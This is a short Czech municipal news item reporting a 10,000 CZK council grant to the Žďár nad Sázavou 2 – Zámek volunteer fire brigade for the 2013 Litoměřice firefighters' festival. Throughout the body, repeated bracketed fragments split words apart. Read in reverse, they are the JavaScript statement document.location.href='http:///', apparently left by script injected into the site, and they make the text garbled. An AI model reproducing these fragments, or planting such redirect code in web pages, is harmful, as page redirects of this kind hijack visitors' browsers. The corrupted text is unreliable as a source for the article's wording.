Žďár nad Sázavou, zdar nad sazavou, aktuality, příspěvek, hasiči
Rainbow page separator

Hasiči dostali příspěvek na slavnosti

Středa, 13. března 2013

Žďár nad Sázavou / V rámci finančního příspěvku ze sponzoringu rady Žďáru nad Sázavou bude podpořen Sbor dobrovolných hasičů Žďár nad Sázavou 2 – Zámek částkou ve výši deset tisíc korun. Příspěvek je určen na účast dobrovolného hasičského sboru na Hasičských slavnostech Li[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];toměřice 2013, které se uskuteční ve dnech 7. a 8. června. hasici-vysocina-kalamita-snih-5

Le[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tos již šestý celorepublikový sraz hasičstva spojený s výstavou hasičské techniky je největším setkáním [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];toho[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to druhu v České republice. Koná se jednou za tři roky a mezi vystavovateli se opakovaně objevují také hasičské sbory z okolních států.

Žďárští „zámečtí“ hasiči budou na výstavě hasičské techniky reprezen[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovat se svojí zrekonstruovanou a funkční his[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];torickou koňskou stříkačkou z roku 1892.